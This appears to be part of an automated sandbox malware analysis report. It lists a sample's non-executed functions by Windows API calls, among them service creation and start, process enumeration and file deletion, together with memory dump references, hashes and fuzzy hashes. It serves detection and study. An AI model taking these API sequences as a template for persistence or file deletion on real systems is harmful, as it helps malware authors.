                                                                                                                                                                                                            • Opcode ID: fb6ad022c96201497fecab829161df29a9393a3e7afd10e341746d21400d6a0c
                                                                                                                                                                                                            • Instruction ID: 33253f8a111a098c066300093cf6db2359c199d7a30ea3ed47c8416afab21d11
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb6ad022c96201497fecab829161df29a9393a3e7afd10e341746d21400d6a0c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CF0AF71250222EFC706DFE1FD0A0663BF8FB9E3613414002E449961B5E77848A3DF96

                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                            Function 00A40500 Relevance: 13.7, APIs: 9, Instructions: 170serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 00A40537
                                                                                                                                                                                                            • CreateServiceA.ADVAPI32(00000000,00F7E6B0,00F7E6B0,000F01FF,00000110,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00A40596
                                                                                                                                                                                                            • ChangeServiceConfig2A.ADVAPI32(00000000,00000001,?), ref: 00A40615
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00A4062A
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00A406A7
                                                                                                                                                                                                            • OpenServiceA.ADVAPI32(00000000,00F7E6B0,00000010), ref: 00A406EB
                                                                                                                                                                                                            • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00A4072D
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00A4073E
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00A407A8
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$CloseHandle$OpenStart$ChangeConfig2CreateManager
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3525021261-0
                                                                                                                                                                                                            • Opcode ID: de8e159468b4f0bc8a9bb0894b80a4a299a9a1fb82c03c2f995eb625e9809858
                                                                                                                                                                                                            • Instruction ID: ce417c1d91f3ce8d51d631607863670805ea07e0a46e1e558e61201db612544a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: de8e159468b4f0bc8a9bb0894b80a4a299a9a1fb82c03c2f995eb625e9809858
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C610D32A01210EFD301CFE4FC8AB663BB0FB85701F118606E546AA2B6D7B054A3DF45
                                                                                                                                                                                                            Function 00A3AF20 Relevance: 7.9, APIs: 5, Instructions: 385serviceCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,80000000), ref: 00A3B0AA
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,?,00000024,?,?,00000000), ref: 00A3B15A
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00A3B17A
                                                                                                                                                                                                            • EnumServicesStatusA.ADVAPI32(00000000,00000030,00000003,00000000,?,?,?,00000000), ref: 00A3B216
                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00A3B41C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: EnumServicesStatus$CloseErrorHandleLastManagerOpenService
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1579346331-0
                                                                                                                                                                                                            • Opcode ID: 1096e11805b1d408d25a6790cc0bdd99606469bfdccd1a57d342e1e3a1eb41ed
                                                                                                                                                                                                            • Instruction ID: 445cd35e24f8a97e8b833ff1900e65b5adb00d07f1ff57f3b76efc3d26dd96be
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1096e11805b1d408d25a6790cc0bdd99606469bfdccd1a57d342e1e3a1eb41ed
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5FF158B2A10202DFC704DFE4FD857AA3BB1F794350F11821AE646972B6E7748893CB95
                                                                                                                                                                                                            Function 00A59580 Relevance: 7.7, APIs: 5, Instructions: 220filesleepCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00000001), ref: 00A59679
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00A597B8
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00A598A9
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 00A598CB
                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00A598E4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteFirstNextSleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1528862845-0
                                                                                                                                                                                                            • Opcode ID: 26deea10f89413d119bc0d3c803a3602e587578ddf8a2ced69b8a5936307c02b
                                                                                                                                                                                                            • Instruction ID: a3d58b3399594d122d120d5f04eb7e5b9b38f5472d16f7701e955c1fcc323117
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26deea10f89413d119bc0d3c803a3602e587578ddf8a2ced69b8a5936307c02b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D911676900302DFC704DFE4FD865A637B0FB9A301B40861AE94A9B6B1EB744997CF51
                                                                                                                                                                                                            Function 00A46C10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 187registrysynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegisterServiceCtrlHandlerA.ADVAPI32(00F7E6B0,Function_00011860), ref: 00A46D72
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46DD5
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A46DE9
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46E8A
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 00A46EBE
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46F2B
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A46F42
                                                                                                                                                                                                            • SetServiceStatus.ADVAPI32(00000000,00AA05F8), ref: 00A46FAA
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Service$Status$CloseCreateCtrlEventHandleHandlerObjectRegisterSingleWait
                                                                                                                                                                                                            • String ID: =ZMI
                                                                                                                                                                                                            • API String ID: 3399922960-150576250
                                                                                                                                                                                                            • Opcode ID: c59585d34e5be1a0c39dee3d6b35e907823d28627476febd6b89b8f261f8c9f1
                                                                                                                                                                                                            • Instruction ID: 9b52648552593a5778e792c8ef0ac2980204434f91145e5263eef7a4b213864e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c59585d34e5be1a0c39dee3d6b35e907823d28627476febd6b89b8f261f8c9f1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7891A875A01302CFD304CFE8FD8A9263BB5FB9A310B01C61AE45A862B5D77844A7CF46
                                                                                                                                                                                                            Function 00A44380 Relevance: 10.9, APIs: 7, Instructions: 387processCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00A444A7
                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 00A445C2
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 00A447CE
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00A44842
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0000000A), ref: 00A4495A
                                                                                                                                                                                                            • Process32Next.KERNEL32(?,00000128), ref: 00A449AD
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A44A20
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32$Module32Next
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 930127669-0
                                                                                                                                                                                                            • Opcode ID: 35dc4ec46c7b823aef5a53de2999291b85a681e27805a3dfe1dc80e4ba1f231a
                                                                                                                                                                                                            • Instruction ID: 49e08c34100de70ce558eec95754fba04ea2fd7c6ef95ce187558c18034a9a3d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35dc4ec46c7b823aef5a53de2999291b85a681e27805a3dfe1dc80e4ba1f231a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAF14371A00202CFE704DFE9FC866693BB5F789311B01821AE44AC62B6EB7449E7CF51
                                                                                                                                                                                                            Function 00A3CA40 Relevance: 10.8, APIs: 7, Instructions: 345fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 00A3CB20
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00A3CB5D
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A3CBBD
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A3CC1D
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00A3CED4
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00A3CF0E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00A3CF47
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$CloseCreateHandle$CountReadTickWrite
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3478262135-0
                                                                                                                                                                                                            • Opcode ID: 4e670c0918ac8da224ea325960e5d88cdd03eade04c7de2470dd2a16c0f6e262
                                                                                                                                                                                                            • Instruction ID: 8c257779c19ac687b70482483f60f8c7ed3b8783cbcc384463517b387fa4c27c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e670c0918ac8da224ea325960e5d88cdd03eade04c7de2470dd2a16c0f6e262
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73E14472A00201DFD704DFE4FD99AA937B4FB95720F10811AE44A9B2F5EB7049A3CB55
                                                                                                                                                                                                            Function 00A65440 Relevance: 7.6, APIs: 5, Instructions: 71synchronizationthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,00A4E92E,00A4CA40,00000000,?), ref: 00A654B2
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00A654E4
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00A4E92E,00A4CA40,00000000,?), ref: 00A6551D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00A4E92E,00A4CA40,00000000,?), ref: 00A65538
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,000000FF,?,00A4E92E,00A4CA40,00000000,?), ref: 00A6554B
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseCreateHandle$EventObjectSingleThreadWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1404307249-0
                                                                                                                                                                                                            • Opcode ID: 5ad323cc4031770fb6ecbd95b36ca535b0f891e548d2eea525ce2f7292b5a8d6
                                                                                                                                                                                                            • Instruction ID: 215c1bd99f08ee1ed8c8d59e23a8217e5f3a2f6b9cc5e3a29d7dc0437d63e2bd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ad323cc4031770fb6ecbd95b36ca535b0f891e548d2eea525ce2f7292b5a8d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74319A30A00302DFD308CFA4EC55B627BF4FB58711F11C10AE64A9A6F0E7B08482CB94
                                                                                                                                                                                                            Function 00A3D000 Relevance: 6.3, APIs: 4, Instructions: 269fileCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3D11A
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,00005000,?,00000000), ref: 00A3D1CC
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00A3D3EE
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00A3D2E9
                                                                                                                                                                                                              • Part of subcall function 00A5FCC0: ReleaseMutex.KERNEL32(00A3D410,?,00A3D410,00000124), ref: 00A5FCE9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseFileHandle$CreateMutexReadRelease
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1760212717-0
                                                                                                                                                                                                            • Opcode ID: e02a80854afacdf2c570b97747e2d1baf9c1187ac199642f01ba4f368193e844
                                                                                                                                                                                                            • Instruction ID: d3aafe448fd1fe2eb8ee35f2d5c27203a8ba157755f6e090e8070c71bcd5adb4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e02a80854afacdf2c570b97747e2d1baf9c1187ac199642f01ba4f368193e844
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87B144B2A00601DBD704DFE4FC8676A3BB5FBD8311F118156E549862F1EB7049A7CB82
                                                                                                                                                                                                            Function 00A468D0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00A403A9,00000000,?), ref: 00A46957
                                                                                                                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,?,00A403A9,00000000), ref: 00A4695E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,00A403A9,00000000,?), ref: 00A469C8
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00A403A9,00000000,?), ref: 00A469CF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$AllocAllocate
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1154092256-0
                                                                                                                                                                                                            • Opcode ID: 1366f8e83cec30296f4d264fe60031fc695a163b6fce106dd267c26d4b885b92
                                                                                                                                                                                                            • Instruction ID: 9e551574a25923334a05601fbc6cba99f61f3ae9c0274e63d74a3b322e013c0a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1366f8e83cec30296f4d264fe60031fc695a163b6fce106dd267c26d4b885b92
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721C072A00601DFD705DFE1FE89A553F78F786310B628605D54A921B6EB3198B3CF61
                                                                                                                                                                                                            Function 00A50FD8 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: XH$/
                                                                                                                                                                                                            • API String ID: 0-571299465
                                                                                                                                                                                                            • Opcode ID: 655c91e7dfa10185b5f462ac1dbf03d0b5a084fd6e778f1bca01eab606fc198f
                                                                                                                                                                                                            • Instruction ID: 527bfe71cb5981a9bdd86815a3397d12b391aa472feaeaa7c7565e7abc18b9d2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 655c91e7dfa10185b5f462ac1dbf03d0b5a084fd6e778f1bca01eab606fc198f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF1DF31910212DBDB04EFE0FD92BBA37B8FB55311F00822AE54A561F2EB70499BCB50
                                                                                                                                                                                                            Function 00A650E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134timeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(00A5247D,00000001,?,?,00A5247D), ref: 00A6518C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00A652BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000005.00000002.2077154991.0000000000A31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077138911.0000000000A30000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077181409.0000000000A67000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000A6C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000AA9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077201160.0000000000ABA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000005.00000002.2077261874.0000000000ABB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_a30000_amdrhfskpcu.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CountSystemTickTime
                                                                                                                                                                                                            • String ID: @AB
                                                                                                                                                                                                            • API String ID: 2164215191-841575833
                                                                                                                                                                                                            • Opcode ID: c74745e614e743ec1cdb1bca26d92038d83242aea85fd3c5bfe3dfd70ad133ac
                                                                                                                                                                                                            • Instruction ID: 6f62f3329ec825d48679b0233fc0ec290a1f2640418363a609b0444e1603681e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c74745e614e743ec1cdb1bca26d92038d83242aea85fd3c5bfe3dfd70ad133ac
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6951CEB2A10601CFC308DFF9FD8A6263BB1F7993107058216D48AC72B5EB7498A7CB45

